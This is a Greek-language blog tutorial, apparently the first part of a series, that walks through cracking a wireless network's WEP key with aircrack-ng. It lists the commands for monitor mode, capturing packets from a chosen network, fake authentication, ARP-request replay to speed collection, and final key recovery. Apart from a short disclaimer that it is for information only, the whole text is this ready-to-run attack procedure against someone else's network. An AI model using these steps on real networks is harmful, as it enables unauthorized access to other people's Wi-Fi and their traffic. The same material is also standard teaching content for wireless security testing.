Σπάσιμο Κωδικών Ασύρματων Δικτύων – 3 — Cracking WEP – Μέρος 1ο – Βασικά βήματα


Σημείωση : Οι πληροφορίες που ακολουθούν στο συγκεκριμμένο άρθρο έχουν χαρακτήρα καθαρά ενημερωτικό. O γράφων δεν φέρει καμία ευθύνη για την χρησιμοποιήση των παρακάτω καθ’ οιονδήποτε μη σύννομο τρόπο.

Η διαδικασία

  • Θέτουμε την ασύρματη κάρτα δικτύου σε Monitor Mode
    …έτσι ώστε να μπορούμε να συλλέξουμε όλα τα πακέτα που κυκλοφορούν στον αέρα χωρίς αυτά αναγκαστικά να προορίζονται σε εμάς.
    sudo airmon-ng stop ath0
    sudo airmon-ng start wifi0

  • Ελέγχουμε τα υπάρχοντα δίκτυα επιλέγοντας αυτό το οποίο μας ενδιαφέρει.
    Καταγράφουμε Channel, ESSID, BSSID.
    sudo airodump-ng ath0

  • Ξεκινάμε το sniffing
    …προσδιορίζοντας όλα τα στοιχεία που έχουμε ήδη καταγράψει για το δίκτυο που μας ενδιαφέρει και αποθηκεύουμε τα πακέτα σε ένα αρχείο “dump” (οι όροι με κεφαλαία αντικαθίστανται από αυτούς που έχουμε σημειώσει)
    sudo airodump-ng -c CHANNEL --bssid BSSID --write dump ath0

  • Εντοπίζουμε την MAC Address της κάρτας μας
    …πληκτρολογώντας
    ifconfig

  • “Συνδεόμαστε άτυπα” με το δίκτυο
    …σε άλλο tab της κονσόλας, έτσι ώστε εκείνο να μας στέλνει πακέτα.
    sudo aireplay-ng -1 30 -q 1 -e ESSID -a BSSID -h MAC ath0

  • Επιχειρούμε να εντοπίσουμε την παραλαβή τυχόντων ARP Requests
    …τις οποίες και αποστέλλουμε ξανά στον router, με σκοπό την επιτάχυνση παραλαβής κρυπτογραφημένων πακέτων.
    sudo aireplay-ng -3 -b BSSID -h MAC -x 1024 ath0

  • Αφότου ξεκινήσει η παραλαβή/αποστολή των ARP Requests
    …ξεκινάμε την αποκρυπτογράφηση του κλειδιού WEP.
    aircrack-ng -z -b BSSID dump

Μετά από μερικά λεπτά, και τη συλλογή μερικών δεκάδων χιλιάδων κρυπτογραφημένων πακέτων (ή αλλιώς IVs), το AirCrack θα σας εμφανίσει τον κωδικού WEP του δικτύου.

<< Προηγούμενο Μάθημα
Απαραίτητα Εφόδια
Επόμενο Μάθημα >>
Cracking WEP – Μέρος 2ο




Ετικέττες

-

Σού άρεσε? Πρότεινέ το σ' έναν φίλο!

Συναφή Άρθρα